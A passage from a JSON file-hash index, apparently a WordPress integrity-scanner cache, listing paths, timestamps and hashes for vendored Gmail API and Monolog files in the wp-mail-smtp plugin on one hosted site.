Google\\/Service\\/Gmail\\/WatchRequest.php\":{\"d\":1544495632,\"h\":\"eec1d4c884f8bfa6de227f5f275b512e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/HistoryLabelAdded.php\":{\"d\":1544495632,\"h\":\"fd4f58550dd30651d1dc490280f95439\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/VacationSettings.php\":{\"d\":1544495632,\"h\":\"a8c288ba351c38e4d058aa868fba7e25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/SendAs.php\":{\"d\":1544495632,\"h\":\"55a21e2758bcca0ae88530d17d6d8a89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/HistoryLabelRemoved.php\":{\"d\":1544495632,\"h\":\"72a3773caa49000737c72a41d6caf62c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/LabelColor.php\":{\"d\":1544495632,\"h\":\"4de043785b8fbdfd71bc0bfc3c72f74c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListFiltersResponse.php\":{\"d\":1544495632,\"h\":\"362aff1ac4c752ba012b5a5c2e79b4ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/PopSettings.php\":{\"d\":1544495632,\"h\":\"762586fba9bb5dabdeba2515922fa6ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListDraftsResponse.php\":{\"d\":1544495632,\"h\":\"d66de47e5a9a3f75c16e6911e6aa2ef8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/Message.php\":{\"d\":1544495632,\"h\":\"7a6a5bf4ade487c72739298b82e16c54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/HistoryMessageAdded.php\":{\"d\":1544495632,\"h\":\"127d845d212cdfa8627f81d50f9d6f4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/FilterAction.php\":{\"d\":1544495632,\"h\":\"df1ecf3287efacd1ece1b30425110e33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ModifyMessageRequest.php\":{\"d\":1544495632,\"h\":\"87b1fee736ce99cbf50d37431b8d3ff2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListSmimeInfoResponse.php\":{\"d\":1544495632,\"h\":\"2216b055e3aaf1689c761a465c7bb4e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/Profile.php\":{\"d\":1544495632,\"h\":\"01781b3a95794d6cab108fc261563711\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/MessagePart.php\":{\"d\":1544495632,\"h\":\"79c3dc5de90b45a4f59c2c0636c9bc56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/Delegate.php\":{\"d\":1544495632,\"h\":\"36d7a4e076297109a0bd034c82f1b980\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListForwardingAddressesResponse.php\":{\"d\":1544495632,\"h\":\"071508d830ab6f3fb6e55a4c7cfb02f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/Filter.php\":{\"d\":1544495632,\"h\":\"c99edb36c8d72df78e354923c8f073e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/FilterCriteria.php\":{\"d\":1544495632,\"h\":\"14c316c043c05672d830e21360de8653\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListThreadsResponse.php\":{\"d\":1544495632,\"h\":\"5bb6d5949972cc996de1652b255bc77e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/BatchModifyMessagesRequest.php\":{\"d\":1544495632,\"h\":\"96de1c58362d8a18ed55d566a8f011b6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ImapSettings.php\":{\"d\":1544495632,\"h\":\"9ad2db4adc2880d18a2ccf912596c026\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/Label.php\":{\"d\":1544495632,\"h\":\"74266b4ffd2def3c78c5277524b0582c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ModifyThreadRequest.php\":{\"d\":1544495632,\"h\":\"59b144e9836db0a39e24efb9ccfdd183\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListDelegatesResponse.php\":{\"d\":1544495632,\"h\":\"c045067ed6155ab01c9bcc2297aab797\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/MessagePartBody.php\":{\"d\":1544495632,\"h\":\"d695341a506ba809578d64067f6361ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/Thread.php\":{\"d\":1544495632,\"h\":\"0a2dfebc867ec170eb04fbee5b8ec3fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/BatchDeleteMessagesRequest.php\":{\"d\":1544495632,\"h\":\"dc066e6ddbecb78e4b8544fd202cb843\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ForwardingAddress.php\":{\"d\":1544495632,\"h\":\"ccc63f1130c23e38f1b2b6d57e953bac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListMessagesResponse.php\":{\"d\":1544495632,\"h\":\"6b57a081d8699055d3510d111fd2e245\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/SmtpMsa.php\":{\"d\":1544495632,\"h\":\"c03490f63347b2e69bf7819003bea8ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/Draft.php\":{\"d\":1544495632,\"h\":\"ef16ae9837d3b827713daaa2eea819fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/HistoryMessageDeleted.php\":{\"d\":1544495632,\"h\":\"986728d043974b32e5ee7e421264307e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/WatchResponse.php\":{\"d\":1544495632,\"h\":\"961e7784e42580e0789843990503f56b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListSendAsResponse.php\":{\"d\":1544495632,\"h\":\"0554c6667299b2824ba9b718afaee934\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/AutoForwarding.php\":{\"d\":1544495632,\"h\":\"864559b43bcd9c550cbc6c0ed6d44859\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail\\/ListHistoryResponse.php\":{\"d\":1544495632,\"h\":\"2b8b89ce288b600feeecefa31da8a957\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/src\\/Google\\/Service\\/Gmail.php\":{\"d\":1544495632,\"h\":\"d32ea5d8e88ebb4017f2fe6dd7f821db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/google\\/apiclient-services\\/LICENSE\":{\"d\":1544495632,\"h\":\"55e7ff97994f4fedbd443167523f7e2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SyslogUdp\\/UdpSocket.php\":{\"d\":1544495632,\"h\":\"3585d916f9c3280d9d2c61abc6aa8c0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/Slack\\/SlackRecord.php\":{\"d\":1544495632,\"h\":\"139c7285b82094a3673cccf7a3c86841\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/Curl\\/Util.php\":{\"d\":1544495632,\"h\":\"03a2418311682d52f8ac22ff5652cd4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FingersCrossed\\/ErrorLevelActivationStrategy.php\":{\"d\":1544495632,\"h\":\"f31a9ad59022efe0de63808d275a0031\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FingersCrossed\\/ChannelLevelActivationStrategy.php\":{\"d\":1544495632,\"h\":\"b0d0c657952bc1d8a8337a6516abd097\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FingersCrossed\\/ActivationStrategyInterface.php\":{\"d\":1544495632,\"h\":\"87e09424f9437e095915c57aad7f05e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SlackHandler.php\":{\"d\":1544495632,\"h\":\"7a0b448bef960dd749c97effcd77bf33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/RotatingFileHandler.php\":{\"d\":1544495632,\"h\":\"c1d51504a874d216a73d7a16d8d74b15\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/RavenHandler.php\":{\"d\":1544495632,\"h\":\"efd4fa559b9b67d87d7ae287fae71345\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SwiftMailerHandler.php\":{\"d\":1544495632,\"h\":\"852668d8e8374f7954025a30620cb6fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/MongoDBHandler.php\":{\"d\":1544495632,\"h\":\"44ade8a7a6002a6210b36c26c89cbacb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/PushoverHandler.php\":{\"d\":1544495632,\"h\":\"807422b20660ffffc7fb99c106ceb4dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FlowdockHandler.php\":{\"d\":1544495632,\"h\":\"94c7a4507949751276a6fef75b92a529\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/HandlerWrapper.php\":{\"d\":1544495632,\"h\":\"a1f1650992d82ebb8fd99fb8a1ad011a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SocketHandler.php\":{\"d\":1544495632,\"h\":\"76a96570463de4d20951fd93fff8f891\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/NewRelicHandler.php\":{\"d\":1544495632,\"h\":\"77c5f0d82d6498b12f3eee4a0a282b2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/AbstractHandler.php\":{\"d\":1544495632,\"h\":\"63f1d9ccfadec8e2f6ebd22ff041bd69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/PHPConsoleHandler.php\":{\"d\":1544495632,\"h\":\"31553b7fa8087df65179bdc673d678ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/IFTTTHandler.php\":{\"d\":1544495632,\"h\":\"65fd860619a84b5b548d803f1450f18f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/BrowserConsoleHandler.php\":{\"d\":1544495632,\"h\":\"0645ca35376e49867ebf7ccb634e8ca1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/AbstractSyslogHandler.php\":{\"d\":1544495632,\"h\":\"3e697fe71a14d7052558ef2637a463a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FingersCrossedHandler.php\":{\"d\":1544495632,\"h\":\"d858b5b5a26b7f8a60c6f687d8dbd0be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/HipChatHandler.php\":{\"d\":1544495632,\"h\":\"5594ae8adf68ccffb00232e97a887d72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/RollbarHandler.php\":{\"d\":1544495632,\"h\":\"99bfe1a418679c198c97a3270eb46cb3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SlackbotHandler.php\":{\"d\":1544495632,\"h\":\"2229f1f8a0b544bc9d6e4d8810150b0f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/GroupHandler.php\":{\"d\":1544495632,\"h\":\"7eaa5f44f2c8c9bcefbfa8ddd82beba7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/ErrorLogHandler.php\":{\"d\":1544495632,\"h\":\"60ed22e1b4289a5210f9d8358b3d8f24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/HandlerInterface.php\":{\"d\":1544495632,\"h\":\"a14d882a9afb7d9e3a5e2daa912cb3f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/LogEntriesHandler.php\":{\"d\":1544495632,\"h\":\"c5b8e8b997dad122fb26d420d7eed287\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/LogglyHandler.php\":{\"d\":1544495632,\"h\":\"beee53f1c85666d49978d0d8c0324a2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FilterHandler.php\":{\"d\":1544495632,\"h\":\"2d087808e02f95080212cc392aa5b2c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SyslogUdpHandler.php\":{\"d\":1544495632,\"h\":\"647b72900ad2b1c62809ca2e5a34b7b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/NativeMailerHandler.php\":{\"d\":1544495632,\"h\":\"119019e45d2c65cbe85a3aadc28771fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/TestHandler.php\":{\"d\":1544495632,\"h\":\"0bb921323349e1bc2f5d46ce693efd85\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/StreamHandler.php\":{\"d\":1544495632,\"h\":\"6f3198651a1f726042b35d10dfbea267\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SyslogHandler.php\":{\"d\":1544495632,\"h\":\"ac625636dc450133b90c5821d98e2a7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/DeduplicationHandler.php\":{\"d\":1544495632,\"h\":\"112f1ead45ef6f90324676d7d0f1ec6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/CouchDBHandler.php\":{\"d\":1544495632,\"h\":\"dabb90eb921328aeb4d8a0c8df2b4e2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/MandrillHandler.php\":{\"d\":1544495632,\"h\":\"780cc72b741c1299f2886e21a80188d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FleepHookHandler.php\":{\"d\":1544495632,\"h\":\"0c3e3f8711aa3641227a7cfd11dfa100\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/GelfHandler.php\":{\"d\":1544495632,\"h\":\"f9577a2c76bd8b9da97907dda0da0899\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/MailHandler.php\":{\"d\":1544495632,\"h\":\"e4702d256f19f3a3b6ee8f61c84d3a2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/NullHandler.php\":{\"d\":1544495632,\"h\":\"252c1e7aa89297f3b65138c5aa12f222\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/InsightOpsHandler.php\":{\"d\":1544495632,\"h\":\"8149a123e81e3dfee9185d5f14eccfc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/FirePHPHandler.php\":{\"d\":1544495632,\"h\":\"b878045f62f8872d866d24fb23b47b44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/DynamoDbHandler.php\":{\"d\":1544495632,\"h\":\"f2dd1a8fce0c3bb7d81a858af3ce9e8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/ZendMonitorHandler.php\":{\"d\":1544495632,\"h\":\"dc2ee6716c9dee2ef3d420c41ac0dc2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/ChromePHPHandler.php\":{\"d\":1544495632,\"h\":\"40763f1c347ac1c67d4ef49f3f5edaa5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/AmqpHandler.php\":{\"d\":1544495632,\"h\":\"89ef97bd70a1876bbf0a151914a4ce26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/ElasticSearchHandler.php\":{\"d\":1544495632,\"h\":\"8b14afbfb4ec910b55be774e612d79f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/AbstractProcessingHandler.php\":{\"d\":1544495632,\"h\":\"837be8c4a76bc37c36ef1f37d83de8b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/DoctrineCouchDBHandler.php\":{\"d\":1544495632,\"h\":\"abc48686f395a089e55a2ec1a4fe4b78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/CubeHandler.php\":{\"d\":1544495632,\"h\":\"c73840367d25bd3fd774c84e0b791aa2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SamplingHandler.php\":{\"d\":1544495632,\"h\":\"85fc2f7a5cf4f34749aa70cbc8c732e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/PsrHandler.php\":{\"d\":1544495632,\"h\":\"e8c8672646919427bb614bf2e7fe8710\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/MissingExtensionException.php\":{\"d\":1544495632,\"h\":\"99ec7108652f07752a6e4585f781ee92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/RedisHandler.php\":{\"d\":1544495632,\"h\":\"b94192bac0cab9928cbce17b8dfa9d6f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/WhatFailureGroupHandler.php\":{\"d\":1544495632,\"h\":\"402e708018cbc501302c2f6640601d77\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/SlackWebhookHandler.php\":{\"d\":1544495632,\"h\":\"81c05f3ced53a5e674f292b085c766d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Handler\\/BufferHandler.php\":{\"d\":1544495632,\"h\":\"3ebccf758cc0a237686c060d1b78de6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/ChromePHPFormatter.php\":{\"d\":1544495632,\"h\":\"85f1ca2b1e239ba8d8c0e55c1d6e28e9